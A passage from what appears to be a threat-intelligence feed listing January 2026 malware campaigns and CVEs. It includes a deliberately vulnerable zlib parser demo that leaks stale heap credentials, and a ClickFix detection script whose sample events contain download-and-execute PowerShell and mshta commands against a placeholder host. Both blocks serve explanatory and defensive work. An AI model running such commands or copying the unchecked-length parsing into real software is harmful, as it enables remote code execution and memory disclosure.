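    data = zlib.decompress(frame[4:], bufsize=max(declared_len, 1))
    if len(data) != declared_len:
        raise ValueError(f"length mismatch: declared {declared_len}, got {len(data)}")
    out = heap.allocate(declared_len)
    out[:declared_len] = data
    return bytes(out[:declared_len])


def demo():
    """Constructed scenario: an earlier request left credentials in the allocation."""
    heap = StaleHeap(b'{"user":"admin","pwd":"hunter2"}' + b"\x00" * 32)
    lying_frame = build_frame(b'{"ping":1}', declared_len=40)
    return parse_vulnerable(lying_frame, heap)


if __name__ == "__main__":
    print(demo())   # b'{"ping":1}' followed by leftover bytes of the previous request
```

The fix is two checks, not one: bound the declared length before allocating (otherwise the same field is a memory-exhaustion vector) and compare it with what the decompressor actually produced before any byte of the buffer is returned to the client.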
| 17.1.26 | Multi-Stage AsyncRAT Campaign Abuses Dropbox and Cloudflare | A recent AsyncRAT malware campaign abuses Dropbox and Cloudflare to deliver its payload. Initiated by phishing emails with Dropbox links, the multi-stage attack continues by disguising malicious downloads using double extensions. | ALERTS | CAMPAIGN |
| 17.1.26 | RustyWater Campaigns in the Middle East | CloudSEK recently reported a MuddyWater spear-phishing wave across Middle East targets (diplomatic, maritime, finance, telecom), where spoofed lures and malicious Word docs drop a newer Rust implant they call “RustyWater.” | ALERTS | PHISHING |
| 17.1.26 | That performance report might give you Guloader | A recent report by researchers at AhnLab highlights a Guloader campaign disguised as an employee performance review. Following a successful social engineering attempt via malspam, the attached payload (a RAR file) is opened and its embedded Guloader executable is launched to begin the attack chain. | ALERTS | VIRUS |
| 17.1.26 | Astaroth banking malware leverages WhatsApp Web for distribution | Acronis Threat Research Unit has identified a new campaign of the Brazilian banking malware Astaroth dubbed "Boto Cor-de-Rosa." This latest iteration marks a significant evolution in the malware's capabilities, specifically regarding its distribution method. Astaroth now includes a Python-based worm module capable of exploiting WhatsApp Web to spread infection. | ALERTS | VIRUS |
| 17.1.26 | CVE-2025-22226 | VMware ESXi, Workstation, and Fusion contain an information disclosure vulnerability due to an out-of-bounds read in HGFS. A malicious actor with administrative privileges to a virtual machine may be able to exploit this issue to leak memory from the vmx process. | VULNEREBILITY | VULNEREBILITY |
| 17.1.26 | CVE-2025-22225 | VMware ESXi contains an arbitrary write vulnerability. A malicious actor with privileges within the VMX process may trigger an arbitrary kernel write leading to an escape of the sandbox. | VULNEREBILITY | VULNEREBILITY |
| 17.1.26 | CVE-2025-22224 | VMware ESXi, and Workstation contain a TOCTOU (Time-of-Check Time-of-Use) vulnerability that leads to an out-of-bounds write. A malicious actor with local administrative privileges on a virtual machine may exploit this issue to execute code as the virtual machine's VMX process running on the host. | VULNEREBILITY | VULNEREBILITY |
| 17.1.26 | CVE-2025-68428 | jsPDF is a library to generate PDFs in JavaScript. Prior to version 4.0.0, user control of the first argument of the loadFile method in the node.js build allows local file inclusion/path traversal. | VULNEREBILITY | VULNEREBILITY |
| 17.1.26 | CVE-2026-0625 | Multiple D-Link DSL/DIR/DNS devices contain an authentication bypass and improper access control vulnerability in the dnscfg.cgi endpoint that allows an unauthenticated attacker to access DNS configuration functionality | VULNEREBILITY | VULNEREBILITY |
| 17.1.26 | Mamba Phishing-as-a-Service Kit | INTRODUCTION CYFIRMA assesses that Mamba 2FA is a representative of a broader class of adversary-in-the-middle phishing frameworks that have become increasingly prevalen | PHISHING | KIT |
| 17.1.26 | SOLYXIMMORTAL | EXECUTIVE SUMMARY SolyxImmortal is a Python-based Windows information-stealing malware that combines credential theft, document harvesting, keystroke logging, screen surveillance, | MALWARE | PYTHON |
| 17.1.26 | KIMSUKI | Kimsuki, an advanced persistent threat (APT) group active since at least 2012, is suspected to be operating out of North Korea in direct support of the regime’s strategic objectives. The… | APT | APT |
| 17.1.26 | Gootloader’s | Planned failure: Gootloader’s malformed ZIP actually works perfectly | MALWARE | LOADER |
| 17.1.26 | LOTUSLITE | LOTUSLITE: Targeted espionage leveraging geopolitical themes | MALWARE | BACKDOOR |
| 16.1.26 | Information Leak and DoS Vulnerabilities in Redmi Buds 3 Pro through 6 Pro | Redmi Buds, a series of Bluetooth earbuds produced and sold by Xiaomi, contain an Information Leak vulnerability and a Denial of Service (DoS) vulnerability in versions 3 Pro through 6 Pro. An attacker within Bluetooth radio range can send specially crafted RFCOMM protocol interactions to the device's internal channels without prior pairing or authentication, enabling the exposure of sensitive call-related data or triggering repeatable firmware crashes. | ALERT | ALERT |
| 16.1.26 | Reprompt | Reprompt: The Single-Click Microsoft Copilot Attack that Silently Steals Your Personal Data | HACKING | AI |
| 16.1.26 | AISURU/Kimwolf | Keeping the Kimwolf at bay: putting a leash on a massive DDoS Botnet. | BOTNET | BOTNET |
| 16.1.26 | UAT-8837 | UAT-8837 targets critical infrastructure sectors in North America | GROUP | GROUP |
| 16.1.26 | CVE-2025-20393 | Reports About Cyberattacks Against Cisco Secure Email Gateway And Cisco Secure Email and Web Manager | VULNEREBILITY | VULNEREBILITY |
| 16.1.26 | CodeBreach | CodeBreach: Infiltrating the AWS Console Supply Chain and Hijacking AWS GitHub Repositories via CodeBuild | VULNEREBILITY | VULNEREBILITY |
| 16.1.26 | CVE-2026-23550 | Incorrect Privilege Assignment vulnerability in Modular DS allows Privilege Escalation.This issue affects Modular DS: from n/a through 2.5.1. | VULNEREBILITY | VULNEREBILITY |
| 16.1.26 | CVE-2026-0227 | PAN-OS: Firewall Denial of Service (DoS) in GlobalProtect Gateway and Portal | VULNEREBILITY | VULNEREBILITY |
| 14.1.26 | "Unreliable Fund": targeted cyberattacks by UAC-0190 against the Defense Forces of Ukraine using PLUGGYAPE (CERT-UA#19092) | During October to December 2025, the National Cyber Incident Response Team CERT-UA, in cooperation with the Cyber Incident Response Team of the Armed Forces of Ukraine (military unit A0334), investigated a series of targeted cyberattacks against representatives of the Defense Forces of Ukraine, carried out under the guise of charitable foundation activity using the PLUGGYAPE software tool. | BATTLEFIELD UKRAINE | BATTLEFIELD UKRAINE |
| 14.1.26 | VoidLink | Unveiling VoidLink – A Stealthy, Cloud-Native Linux Malware Framework | MALWARE | Linux |
| 14.1.26 | CVE-2025-12420 | A vulnerability has been identified in the ServiceNow AI Platform that could enable an unauthenticated user to impersonate another user and perform the operations that the impersonated user is entitled to perform. | VULNEREBILITY | VULNEREBILITY |
| 14.1.26 | SHADOW#REACTOR | SHADOW#REACTOR – Text-Only Staging, .NET Reactor, and In-Memory Remcos RAT Deployment | CAMPAIGN | CAMPAIGN |
| 14.1.26 | CVE-2025-8110 | Improper Symbolic link handling in the PutContents API in Gogs allows Local Execution of Code. | VULNEREBILITY | VULNEREBILITY |
| 14.1.26 | CVE-2025-64155 | An improper neutralization of special elements used in an OS command ('OS Command Injection') vulnerability [CWE-78] in FortiSIEM may allow an unauthenticated attacker to execute unauthorized code or commands via crafted TCP requests. | VULNEREBILITY | VULNEREBILITY |
| 12.1.26 | GoBruteforcer | Inside GoBruteforcer: AI-Generated Server Defaults, Weak Passwords, and Crypto-Focused Campaigns | BOTNET | BOTNET |
| 11.1.26 | BeeS Software Solutions BeeS Examination Tool (BET) portal contains SQL injection vulnerability | The BeeS Examination Tool (BET) portal from BeeS Software Solutions contains an SQL injection vulnerability in its website login functionality. More than 100 universities use the BET portal for test administration and other academic tasks. | ALERT | ALERT |
| 10.1.26 | RustyWater | Reborn in Rust: Muddy Water Evolves Tooling with RustyWater Implant | MALWARE | RAT |
| 10.1.26 | BlueDelta’s Persistent Campaign Against UKR.NET | Between June 2024 and April 2025, Recorded Future’s Insikt Group identified a sustained credential-harvesting campaign targeting users of UKR.NET, a widely used Ukrainian webmail and news service. | REPORT | REPORT |
| 10.1.26 | GRU-Linked BlueDelta Evolves Credential Harvesting | Between February and September 2025, Recorded Future’s Insikt Group identified multiple credential-harvesting campaigns conducted by BlueDelta, a Russian state-sponsored threat group associated with the Main Directorate of the General Staff of the Armed Forces of the Russian Federation (GRU). | REPORT | REPORT |
| 10.1.26 | GRU-Linked BlueDelta Evolves Credential Harvesting | Between February and September 2025, Recorded Future’s Insikt Group identified multiple credential-harvesting campaigns conducted by BlueDelta, a Russian state-sponsored threat group associated with the Main Directorate of the General Staff of the Armed Forces of the Russian Federation (GRU). | BIGBROTHER | BIGBROTHER |
| 10.1.26 | CVE-2025-69258 | A LoadLibraryEX vulnerability in Trend Micro Apex Central could allow an unauthenticated remote attacker to load an attacker-controlled DLL into a key executable, leading to execution of attacker-supplied code under the context of SYSTEM on affected installations. | VULNEREBILITY | VULNEREBILITY |
| 10.1.26 | CVE-2025-69260 | (CVSS score: 7.5) - A message out-of-bounds read vulnerability in Trend Micro Apex Central could allow a remote, unauthenticated attacker to create a denial-of-service condition on affected installations | VULNEREBILITY | VULNEREBILITY |
| 10.1.26 | CVE-2025-69259 | (CVSS score: 7.5) - A message unchecked NULL return value vulnerability in Trend Micro Apex Central could allow a remote, unauthenticated attacker to create a denial-of-service condition on affected installations | VULNEREBILITY | VULNEREBILITY |
| 9.1.26 | Recent Linux-based activities of the UAT-7290 threat group | Cisco Talos has identified a new campaign attributed to threat actor tracked as UAT-7290. The group primarily targets critical infrastructure and telecommunications providers in South Asia, though recent activity indicates a possible expansion into Southeastern Europe. | ALERTS | GROUP |
| 9.1.26 | PHALT#BLYX malicious campaign | A new malware distribution campaign, tracked under the name PHALT#BLYX, is targeting European hospitality firms using phishing emails that impersonate Booking.com reservation cancellation requests. As reported by Securonix, the operation employs a "ClickFix" social engineering tactic: victims who click the email link are shown a fake Windows Blue Screen of Death (BSOD) and are tricked into opening the Windows Run prompt and pasting a malicious PowerShell command to "resolve" the error. | ALERTS | CAMPAIGN |
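The ClickFix chain described above has a telemetry signature worth hunting for: a script interpreter spawned by explorer.exe (the parent of anything launched from the Win+R Run dialog) with a command line that hides its window, decodes a payload or fetches code from the network. The following added example (not Securonix's detection content) runs that logic over constructed Sysmon-style process-creation records; the `Image|ParentImage|CommandLine` field layout is an assumption for the demo, so map it to your own log schema.

```python
"""Detection logic for ClickFix-style execution: a command pasted into the Run dialog.

Added example, not Securonix's detection content. The sample records below are
constructed, and the pipe-separated field layout is an assumption for the demo.
"""
import re

# Constructed sample telemetry: "Image|ParentImage|CommandLine"
SAMPLE_EVENTS = [
    r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe|C:\Windows\explorer.exe|"
    r'powershell -w hidden -nop -c "iex (irm https://example.invalid/fix.ps1)"',
    r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe|C:\Program Files\Corp\Agent\agent.exe|"
    r"powershell -ExecutionPolicy Bypass -File C:\Program Files\Corp\inventory.ps1",
    r"C:\Windows\System32\mshta.exe|C:\Windows\explorer.exe|"
    r"mshta https://example.invalid/bsod.hta",
    r"C:\Windows\System32\notepad.exe|C:\Windows\explorer.exe|notepad.exe",
    r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe|C:\Windows\explorer.exe|"
    r"powershell -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkA",
]

RUN_DIALOG_PARENTS = {"explorer.exe"}        # Win+R launches children of explorer.exe
INTERPRETERS = {"powershell.exe", "pwsh.exe", "mshta.exe", "cmd.exe"}
SUSPICIOUS = [
    (re.compile(r"(?i)(?:^|\s)-(?:e|ec|enc|encodedcommand)\s+[A-Za-z0-9+/=]{20,}"), "encoded command"),
    (re.compile(r"(?i)\b(?:iex|invoke-expression)\b"), "invoke-expression"),
    (re.compile(r"(?i)\b(?:irm|invoke-restmethod|iwr|invoke-webrequest|downloadstring)\b"), "remote fetch"),
    (re.compile(r"(?i)-w(?:indowstyle)?\s+hidden"), "hidden window"),
    (re.compile(r"(?i)\bmshta\b.*https?://"), "mshta remote hta"),
]


def basename(path):
    return path.rsplit("\\", 1)[-1].lower()


def score_event(line):
    """Return (is_alert, reasons) for one 'Image|ParentImage|CommandLine' record."""
    image, parent, cmdline = line.split("|", 2)
    if basename(image) not in INTERPRETERS:
        return False, []
    reasons = [label for rx, label in SUSPICIOUS if rx.search(cmdline)]
    from_run_dialog = basename(parent) in RUN_DIALOG_PARENTS
    if from_run_dialog and reasons:
        return True, ["parent is explorer.exe (Run dialog)"] + reasons
    return False, reasons


def detect(events):
    """Alerts as (command line, reasons) for every record that scores as ClickFix-like."""
    alerts = []
    for line in events:
        hit, reasons = score_event(line)
        if hit:
            alerts.append((line.split("|", 2)[2], reasons))
    return alerts


if __name__ == "__main__":
    for cmd, reasons in detect(SAMPLE_EVENTS):
        print("ALERT:", cmd[:60], "->", ", ".join(reasons))
```

The parent-process condition is what keeps this from firing on every admin script: the second record is the same interpreter with a Bypass policy, but launched by a management agent, and it scores no reasons. Pair this with the RunMRU registry key if your endpoint agent collects it; the pasted command persists there even after the process exits.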
| 9.1.26 | CVE-2025-52691 - SmarterTools SmarterMail vulnerability | CVE-2025-52691 is a recently disclosed critical (CVSS score 10.0) arbitrary file upload vulnerability affecting SmarterTools SmarterMail software, which is an email, groupware, and collaboration server designed as an alternative to enterprise collaboration solutions such as Microsoft Exchange. | ALERTS | VULNEREBILITY |
| 9.1.26 | Kimwolf Android botnet | The Kimwolf botnet has been reported to have infected more than 2 million Android devices by tunneling through residential proxy networks. According to researchers from XLab, the malware is a strain of the AISURU botnet family and has been active on the threat landscape since at least August 2025. The malware has the capability for various DDoS attacks, proxy forwarding, reverse shell and file management, among others. | ALERTS | BOTNET |
| 9.1.26 | TOTOLINK EX200 firmware-upload error handling can activate an unauthenticated root telnet service | A flaw in the firmware-upload error-handling logic of the TOTOLINK EX200 extender can cause the device to unintentionally start an unauthenticated root-level telnet service. This condition may allow a remote authenticated attacker to gain full system access. | ALERT | ALERT |
| 9.1.26 | Vulnerable Python version used in Forcepoint One DLP Client | A vulnerability in the Forcepoint One DLP Client allows bypass of the vendor-implemented Python restrictions designed to prevent arbitrary code execution. | ALERT | ALERT |
| 8.1.26 | Boto-Cor-de-Rosa | Boto-Cor-de-Rosa campaign reveals Astaroth WhatsApp-based worm activity in Brazil | CAMPAIGN | CAMPAIGN |
| 8.1.26 | CVE-2025-66209 | (CVSS score: 10.0) - A command injection vulnerability in the database backup functionality allows any authenticated user with database backup permissions to execute arbitrary commands on the host server, resulting in container escape and full server compromise. | VULNEREBILITY | VULNEREBILITY |
| 8.1.26 | CVE-2025-66210 | (CVSS score: 10.0) - An authenticated command injection vulnerability in the database import functionality allows attackers to execute arbitrary commands on managed servers, leading to full infrastructure compromise. | VULNEREBILITY | VULNEREBILITY |
| 8.1.26 | CVE-2025-66211 | (CVSS score: 10.0) - A command injection vulnerability in the PostgreSQL init script management allows authenticated users with database permissions to execute arbitrary commands as root on the server. | VULNEREBILITY | VULNEREBILITY |
| 8.1.26 | CVE-2025-66212 | (CVSS score: 10.0) - An authenticated command injection vulnerability in the Dynamic Proxy Configuration functionality allows users with server management permissions to execute arbitrary commands as root on managed servers. | VULNEREBILITY | VULNEREBILITY |
| 8.1.26 | CVE-2025-66213 | (CVSS score: 10.0) - An authenticated command injection vulnerability in the File Storage Directory Mount functionality allows users with application/service management permissions to execute arbitrary commands as root on managed servers. | VULNEREBILITY | VULNEREBILITY |
| 8.1.26 | CVE-2025-64419 | (CVSS score: 9.7) - A command injection vulnerability via docker-compose.yaml that enables attackers to execute arbitrary system commands as root on the Coolify instance. | VULNEREBILITY | VULNEREBILITY |
| 8.1.26 | CVE-2025-64420 | (CVSS score: 10.0) - An information disclosure vulnerability that allows low-privileged users to view the private key of the root user on the Coolify instance, allowing them to gain unauthorized access to the server via SSH and authenticate as the root user using the key. | VULNEREBILITY | VULNEREBILITY |
| 8.1.26 | CVE-2025-64424 | (CVSS score: 9.4) - A command injection vulnerability was found in the git source input fields of a resource, allowing a low-privileged user (member) to execute system commands as root on the Coolify instance. | VULNEREBILITY | VULNEREBILITY |
| 8.1.26 | CVE-2025-59156 | (CVSS score: 9.4) - An operating system command injection vulnerability that allows a low-privileged user to inject arbitrary Docker Compose directives and achieve root-level command execution on the underlying host. | VULNEREBILITY | VULNEREBILITY |
| 8.1.26 | CVE-2025-59157 | (CVSS score: 10.0) - An operating system command injection vulnerability that allows a regular user to inject arbitrary shell commands that execute on the underlying server by using the Git Repository field during deployment. | VULNEREBILITY | VULNEREBILITY |
| 8.1.26 | CVE-2025-59158 | (CVSS score: 9.4) - An improper encoding or escaping of data that allows an authenticated user with low privileges to conduct a stored cross-site scripting (XSS) attack during project creation that is automatically executed in the browser context when an administrator later attempts to delete the project or its associated resource. | VULNEREBILITY | VULNEREBILITY |
| 8.1.26 | RedLeaves | | VULNEREBILITY | VULNEREBILITY |
| 8.1.26 | UAT-7290 | UAT-7290 targets high value telecommunications infrastructure in South Asia | MALWARE | RAT |
| 8.1.26 | CVE-2026-20029 | A vulnerability in the licensing features of Cisco Identity Services Engine (ISE) and Cisco ISE Passive Identity Connector (ISE-PIC) could allow an authenticated, remote attacker with administrative privileges to gain access to sensitive information. This vulnerability is due to improper parsing of XML that is processed by the web-based management interface of Cisco ISE and Cisco ISE-PIC. | VULNEREBILITY | VULNEREBILITY |
| 8.1.26 | NodeCordRAT | Malicious NPM Packages Deliver NodeCordRAT | MALWARE | RAT |
| 8.1.26 | CVE-2025-37164 | (CVSS score: 10.0) - A code injection vulnerability in HPE OneView that allows a remote unauthenticated user to perform remote code execution. | VULNEREBILITY | VULNEREBILITY |
| 8.1.26 | CVE-2009-0556 | (CVSS score: 8.8) - A code injection vulnerability in Microsoft Office PowerPoint that allows remote attackers to execute arbitrary code by means of memory corruption. | VULNEREBILITY | VULNEREBILITY |
| 8.1.26 | CVE-2026-21858 | A vulnerability in n8n allows an attacker to access files on the underlying server through execution of certain form-based workflows. A vulnerable workflow could grant access to an unauthenticated remote attacker. | VULNEREBILITY | VULNEREBILITY |
| 8.1.26 | CVE-2026-21877 | Under certain conditions, an authenticated user may be able to cause untrusted code to be executed by the n8n service. This could result in full compromise of the affected instance. | VULNEREBILITY | VULNEREBILITY |
| 8.1.26 | CVE-2025-59469 | (CVSS score: 7.2) - A vulnerability that allows a Backup or Tape Operator to write files as root. | VULNEREBILITY | VULNEREBILITY |
| 8.1.26 | CVE-2025-59468 | (CVSS score: 6.7) - A vulnerability that allows a Backup Administrator to perform RCE as the postgres user by sending a malicious password parameter. | VULNEREBILITY | VULNEREBILITY |
| 8.1.26 | CVE-2025-55125 | (CVSS score: 7.2) - A vulnerability that allows a Backup or Tape Operator to perform RCE as root by creating a malicious backup configuration file. | VULNEREBILITY | VULNEREBILITY |
| 8.1.26 | CVE-2025-59470 | Resolved in Veeam Backup & Replication 13.0.1.1071 | VULNEREBILITY | VULNEREBILITY |
| 7.1.26 | CVE-2026-0625 | Multiple D-Link DSL gateway devices contain a command injection vulnerability in the dnscfg.cgi endpoint due to improper sanitization of user-supplied DNS configuration parameters. | VULNEREBILITY | VULNEREBILITY |
| 7.1.26 | Prompt poaching | Prompt poaching runs rampant in extensions | HACKING | AI |
| 7.1.26 | CVE-2025-65606 | TOTOLINK EX200 firmware-upload error handling can activate an unauthenticated root telnet service | VULNEREBILITY | VULNEREBILITY |
| 7.1.26 | UAC-0184 | UAC-0184 | GROUP | GROUP |
| 7.1.26 | Kimwolf | A Broken System Fueling Botnets | BOTNET | BOTNET |
| 7.1.26 | CVE-2025-68668 | n8n is an open source workflow automation platform. From version 1.0.0 to before 2.0.0, a sandbox bypass vulnerability exists in the Python Code Node that uses Pyodide. | VULNEREBILITY | VULNEREBILITY |
| 5.1.26 | VVS Discord | VVS Discord Stealer Using Pyarmor for Obfuscation and Detection Evasion | MALWARE | STEALER |
| 4.1.26 | Datebug APT campaign targeting governmental organizations in India | Researchers from Cyfirma have identified a targeted cyber espionage campaign attributed to the Datebug APT group (aka APT36, Transparent Tribe). The campaign utilizes a deceptive delivery mechanism involving weaponized Windows shortcut (LNK) files concealed within a ZIP archive, masquerading as a legitimate PDF to trick victims. | ALERTS | APT |
| 3.1.26 | OWASP Top 10 For Agentic Applications 2026 | The information provided in this document does not, and is not intended to, constitute legal advice. | REPORT | REPORT |
| 3.1.26 | CVE-2020-12812 | An improper authentication vulnerability in SSL VPN in FortiOS 6.4.0, 6.2.0 to 6.2.3, 6.0.9 and below may result in a user being able to log in successfully without being prompted for the second factor of authentication (FortiToken) if they changed the case of their username. | VULNEREBILITY | VULNEREBILITY |
| 3.1.26 | MongoDB Unauthenticated Attacker Sensitive Memory Leak | The Situation: A major vulnerability allows unauthenticated attackers to remotely leak sensitive data from MongoDB server memory. No login is required. | HACKING | HACKING |
| 2.1.26 | CVE-2025-59230 | An elevation-of-privilege (EoP) vulnerability in Windows’ Remote Access Connection Manager (RasMan) service. A locally authenticated attacker could exploit improper access control to escalate their privileges to SYSTEM level on affected Windows installations. | VULNEREBILITY | VULNEREBILITY |
| 2.1.26 | CVE-2025-10294 | A critical authentication bypass in the OwnID Passwordless Login plugin for WordPress. Due to improper validation of a shared secret, unauthenticated attackers could log in as arbitrary users, including administrators, without credentials. | VULNEREBILITY | VULNEREBILITY |
| 2.1.26 | CVE-2025-59295 | A heap-based buffer overflow in the Windows MSHTML/Internet Explorer component, enabling arbitrary code execution via specially crafted data sent over the network. | VULNEREBILITY | VULNEREBILITY |
| 2.1.26 | CVE-2025-14847 | Mismatched length fields in Zlib compressed protocol headers may allow a read of uninitialized heap memory by an unauthenticated client. This issue affects all MongoDB Server v7.0 versions prior to 7.0.28. | VULNEREBILITY | VULNEREBILITY |
| 2.1.26 | APT36 | APT36: Multi-Stage LNK Malware Campaign Targeting Indian Government Entities | APT | APT |
| 2.1.26 | RondoDoX Botnet | RondoDoX Botnet Weaponizes React2Shell | BOTNET | BOTNET |
| 2.1.26 | Phishing Campaign Leverages Trusted Google Cloud Automation Capabilities to Evade Detection | This report describes a phishing campaign in which attackers impersonate legitimate Google-generated messages by abusing Google Cloud Application Integration to distribute malicious emails that appear to originate from trusted Google infrastructure. | PHISHING | PHISHING |